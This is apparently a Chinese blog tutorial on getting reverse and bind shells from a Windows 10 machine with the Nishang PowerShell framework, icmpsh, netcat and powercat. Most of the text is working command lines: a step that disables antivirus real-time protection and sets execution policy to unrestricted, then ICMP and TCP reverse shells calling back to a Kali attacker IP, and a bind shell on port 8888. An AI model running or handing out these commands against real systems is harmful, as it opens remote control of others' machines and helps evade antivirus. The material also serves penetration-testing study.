nishang反弹shell多种方式攻击——win10

一、nishang时基于powershell的渗透测试工具,需要powershell的版本达到3.0及以上。推荐win10版本电脑或windowsserver2008以上版本服务器

1、win10上直接以管理员身份运行

2、运行后开始导入nishang框架,导入前需先下载nishang。下载地址:https://github.com/samratashok/nishang(由于win10自带杀毒,下载时需要关闭实时防护)

进入文件前首先运行 set-executionpolicy unrestricted     选择y

进入到解压的nishang文件下,运行import-module ./nishang.psm1,会出现以下问题,证明文件没有丢失。

确认可继续执行Get-Command -Module nishang ,查看文件

这时候环境已经搭好,这时候需要去kali里搭建利用。

二、icmp反弹shell

1、icmp简单介绍:

       使用ICMP协议最常见的就是ping工具,在ping www.baidu.com的时候可以看到,ICMP协议是典型的一问一答模式,本机向百度服务器发送ICMP请求包,如果请求包成功到达目的地,百度服务器则回应ICMP响应包。

       ICMP(Internet Control Message Protocol)是IPv4协议族中的一个子协议,用于IP主机、路由器之间传递控制消息。控制消息是在网络通不通、主机是否可达、路由是否可用等网络本身的消息。

2、漏洞利用

   kali里安装icmpsh工具。  https://github.com/inquisb/icmpsh.git

   

  进入kali中icmpsh目录下,输入命令sysctl -w net.ipv4.icmp_echo_ignore_all=1来禁止ICMP回显。(这步可忽略)

    python icmpsh_m.py 192.168.230 192.168.0.149   或者

   ./icmpsh_m.py 192.168.0.230 192.168.0.149来启动监听(第一个ip是kali的,后面一个是搭建环境windows的ip)

   提示:实现icmp反弹shell虚拟机必须换成桥接模式,下面的几种方式啥都可以。

    

    接下来去powershell里执行:Invoke-PowerShellIcmp -IPAddress 192.168.0.230

    

    这时kali里就会反弹回shell

    

    这时就拿到了权限,接下来你就自己操作,如windows系统操作一样。

 三、 TCP shell

    1、kali不需要下载任何东西直接执行

         nc -lvp 4444  (监听端口,端口可随意更改)

         直接powershell里执行Invoke-PowerShellTcp -Reverse -IPAddress 192.168.197.128  -Port 4444   

         

         

四、Bind shell

   powershell直接执行:

    Invoke-PowerShellTcp.ps1

    Invoke-PowerShellTcp -Bind -Port 8888

    kali里写

   . .powercat.ps1

   powercat -c ip -v -p 8888  (ip是搭建环境系统的ip)

  

 参考链接:www.sohu.com/a/235697862_609556

 

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值